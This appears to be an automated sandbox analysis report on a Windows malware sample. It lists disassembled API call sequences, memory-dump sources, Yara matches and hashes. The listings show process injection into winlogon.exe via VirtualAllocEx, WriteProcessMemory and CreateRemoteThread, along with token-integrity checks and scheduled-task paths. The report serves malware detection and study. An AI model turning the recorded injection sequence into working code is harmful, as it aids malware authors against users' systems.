                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040193A
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040194A
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
                                                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 004019B6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004019C5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 004019D5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004019E1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 004019F4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401A04
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                              • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                              • Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                              • Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                              • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                              • Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                              • Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,?,7702DB30,00402E38,winlogon.exe), ref: 004015AD
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7702DB30,00402E38,winlogon.exe), ref: 004015CC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 004016E8
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401711
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 0040177E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040178F
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 004017CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004017DD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 3542510048-3024904723
                                                                                                                                                                                                            • Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                            • Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 00401D1A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 00401D56
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
                                                                                                                                                                                                            • Opcode ID: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                            • Instruction ID: 6b572b3e0c1d36d44cadbb52a12c0b3f1dd55c4915d11e4f0b3c307bdf2881c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC21B972A0111467D7109BA5AD49B9E77A8EF89720F100276EA04F32E0EB34DD4556A9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00403427
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004033A9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                            • API String ID: 4133869067-1576788796
                                                                                                                                                                                                            • Opcode ID: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
                                                                                                                                                                                                            • Instruction ID: 021f6ab0fc676138f4263539a703c8a5ee641fdd4e06072bb68a67a5c5d36617
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E0188B5E00208EBEB20CFA0DD09B9A7BBCAB85701F4040A5E709B6280D6749F44CF75
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
                                                                                                                                                                                                            • Instruction ID: eac5d11cb92673f9bb66abbec7de51b37a046753e49d1a185180b8ac7a31a903
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D122630A047859FEB25CF18C9806AEB7F1AF96710F14855FE4A68B391C738EE46CB54
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
                                                                                                                                                                                                            • Instruction ID: 021bb5d2b7c0cb56e537b8d227e73ed21d0ebdb26bc59c524461a715ef61eba8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC12F630A047849FEB15CF28C9807AEBBF1AF96314F14855EE8A64B791C738ED42CB54
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
                                                                                                                                                                                                            • Instruction ID: c4f7584d98bb462e22f8ca5efa45b381d380756b5cf0509a019ae382a9018600
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1121570A007859FEB25CF18C9806AEBBF1AF96711F14855FE4A68B351C738EE42CB54
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
                                                                                                                                                                                                            • Instruction ID: b7b9f9f22af13d42a5b6316f7f2a44174fcb43b43f91c23f0d1d097708033df0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F312E530A047859FEB25CF28CA8069A7BF1BF56310F54855EF8A58B381C778ED42CB64
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
                                                                                                                                                                                                            • Instruction ID: c96630ca6486ca8a3dffba479f0708cf21e85e20dbdd268f71493559b7ccfc47
                                                                                                                                                                                                            • Opcode Fuzzy Hash: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91021630A007459FEB24CF18C9806AFB7E1EF91314F14856FE9A68B391D738AD56C798
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 62266d2bb0fd7cb72f5456114ccefa61cd6d3619e0fa61cbae80b75a03c25a28
                                                                                                                                                                                                            • Instruction ID: b5c27d84d61b241dfbbeb53c51d0fdd6cf76b480a9746a7cf7f6d71d37627bea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62266d2bb0fd7cb72f5456114ccefa61cd6d3619e0fa61cbae80b75a03c25a28
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1702F330A007459FEB20CF28C9816AF77E1BF96310F14856FE9A58B391D738AD56CB94
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 842b6e569715697e2913e9ef520192c111f60459be670174adc123d7c1086160
                                                                                                                                                                                                            • Instruction ID: 5c11e9432c662da9e832bb00048f610cc01de9b2e0be984bbf0aa46c625adfee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 842b6e569715697e2913e9ef520192c111f60459be670174adc123d7c1086160
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE02E630A007459FEB24CF18C9916AFB7E1EF92310F14855FE4A69B3A1D738A982C759
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 64ddcdb94234de5d560dda6265b912994e733e8d5260f18d2812bbace300dc76
                                                                                                                                                                                                            • Instruction ID: 6f27e782664b546ea9a7b70d93e541e4de47497114ddd59825f0d455be94bf6b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64ddcdb94234de5d560dda6265b912994e733e8d5260f18d2812bbace300dc76
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE02F430E007459FDB24CF28C581AAF77E1AF99310F14956FE8A58B391D738AD4ACB94
Memory Dump Source
• Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
                                                                                                                                                                                                            • Instruction ID: d8d0adafabcbd5d708f1da50a49402fb3bf4ae1d939e6727f3124d8f61b49aed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9bc7354a3e354d1b015df0f8da07e1055657b15d563b5e6f57843a172319e40
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED51A17150C3A18BD315CF2AC48066BBBE1BBC9314F048E6EE8D497351D778DA09CB96
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
                                                                                                                                                                                                            • Instruction ID: c0d06c3b42bc6b51c97fcab68d65b60e5fd230549ea87696981b9f88f0129265
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f20fa1024a9688b10060da5d67fc074633dd4eaa16d4fe3a3c2409f5f1f9c4f6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00214F339748B601E7504B718D586227BD2CFCB206FAF81B5D644C7992D63ED4029564
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
                                                                                                                                                                                                            • Instruction ID: 83a3f7d0e66a37bb7e6fdedb80276840f88715c9868f56da058082779efa7e5d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9c930fd42fec790c80e573c3d74de70e79dd5c7963e19442b8978de89fab75a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2101C92BB7CE0E45C51940AC1424A6A11801B127657D4063BAAC7F83D5EFEDD86FD84F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
                                                                                                                                                                                                            • Instruction ID: b04785f1e362cafcd50622ec6ea8703a75b25b73c25fc77f3c2a0d59776fd131
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81f8b4470660630fa8e642daca3cb37112d29c707e5c6907703c9fc4351451dd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B01F7B19053189FEB20CF94DD8579BBBF4FB01305F40809DE98D93240C3755644CB96
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                            • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035AB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035F7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035FE
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403616
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403630
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004036D3
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 004036F2
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403725
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004037BB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004037EC
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 004037F3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004037FA
                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0040382B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403887
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040388A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403897
